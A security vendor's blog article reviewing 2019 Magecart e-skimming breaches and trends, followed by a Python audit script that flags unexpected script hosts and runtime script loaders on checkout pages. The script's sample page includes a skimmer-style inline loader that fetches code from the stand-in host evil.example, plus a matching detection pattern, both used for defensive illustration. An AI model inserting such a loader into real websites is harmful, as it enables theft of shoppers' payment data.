January 5, 2020
2019 is barely over, but it has already set the record for “Magecart-style” e-skimming breaches. Macy’s, Procter & Gamble, Sixth June, American Cancer Society, Baseball Hall of Fame, Smith & Wesson, Magento Marketplace, and the Volusion e-commerce platform are some of Magecart’s recent victims. E-skimming infection code was also found hosted on the Salesforce Heroku cloud, in Amazon S3 buckets, on the Amazon CloudFront CDN, and on other content delivery networks. Magecart skimming code was also found impersonating the legitimate security firm Sanguine Security as a way to disguise itself.
RiskIQ believes that more than 17,000 websites were breached by e-skimmers in 2019, a huge increase from the estimated 6,000 website breaches between 2015 and 2018 given in the 2018 report from Flashpoint and RiskIQ.
Skimmers have been actively updating their techniques. In 2019, we saw e-skimming attacks reach the highest volume and new levels of innovation and creativity. Notably, they began using legitimate cloud services like those offered by Amazon CloudFront, Salesforce Heroku, CloudCMS, Volusion, Adobe Magento, and many others. In this article, I will share some of the most notable attack trends and backdoors of the year:
Additionally, attacking third-party tools allows hackers to reach almost all of the target’s customers, gaining the same level of unrestricted access to those customers’ websites and data. Attacks based on open-source libraries and third-party code can hit thousands of companies in one shot, as security researcher Willem de Groot discovered in the Picreel and CloudCMS breaches, which infected more than 4,600 websites. This type of attack is commonly called “drive-by skimming.”
Recently, Magecart-style attackers impersonated the legitimate security firm Sanguine Security to evade detection during their attack on Smith & Wesson. Sanguine Security identified and remediated it very quickly.
A catch-all type of e-skimming compromise was found on public Wi-Fi hotspots by IBM researchers. It gives attackers access to a large number of users in public spaces, including airports and hotels. Because the compromised Wi-Fi routers automatically inject skimming scripts into every website their users visit, the attackers can steal information from all web forms, not just checkout pages.
Some of the world’s most popular e-commerce platforms, like Volusion and the Adobe Magento Marketplace, have been breached by Magecart e-skimming code. These platforms provide checkout services for about 30,000 and 250,000 merchants respectively, giving access to a massive amount of account information. Thousands of online stores have been confirmed to be compromised during the Volusion platform hack, which went undetected for about a month. It’s possible that every e-commerce store on the platform had payment data skimmed.
For instance, Magecart used a two-stage skimming attack in the American Cancer Society website breach.
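As an added example (not code from this article or from Feroot), here is a small Python audit that surfaces on a checkout page the two patterns described above: script tags loaded from a host outside an allowlist (the cloud-hosted and third-party sources discussed earlier) and inline code that builds a script element at runtime, the usual first stage of a two-stage skimmer. The allowlist, the hostnames and the sample page are constructed for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: the only hosts this shop expects to load scripts from.
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example"}
# Inline code that builds a <script> at runtime: the usual first stage of a two-stage skimmer.
LOADER = re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.I)


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def audit_scripts(html, allowed=ALLOWED_HOSTS):
    """Return (kind, detail) findings that a reviewer should look at."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:  # a relative src has no host: same-origin, not flagged
        host = urlparse(src).hostname
        if host and host not in allowed:
            findings.append(("unknown-host", host))
    for body in p.inline:
        if LOADER.search(body):
            findings.append(("inline-loader", body.strip()[:60]))
    return findings

# Constructed sample checkout page: one expected script, one unexpected CDN host, one loader.
SAMPLE = """<html><body><form id="checkout"></form>
<script src="https://cdn.shop.example/app.js"></script>
<script src="https://d111111abcdef8.cloudfront.net/s.js"></script>
<script>var s=document.createElement('script');s.src='//evil.example/x.js';document.head.appendChild(s);</script>
</body></html>"""
```

Running `audit_scripts` against a stored baseline of each checkout page on every deploy, or on a schedule, turns an unexpected CDN host or a new inline loader into an alert instead of a month-long silent compromise.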
Read the next article to learn about the top three emerging trends in e-skimming and new industries that Magecart will likely attack this year.
And, if you are interested in automating your SecOps and hardening your skimming defenses please don’t hesitate to check our site www.feroot.com and feel free to ask questions or ask for help.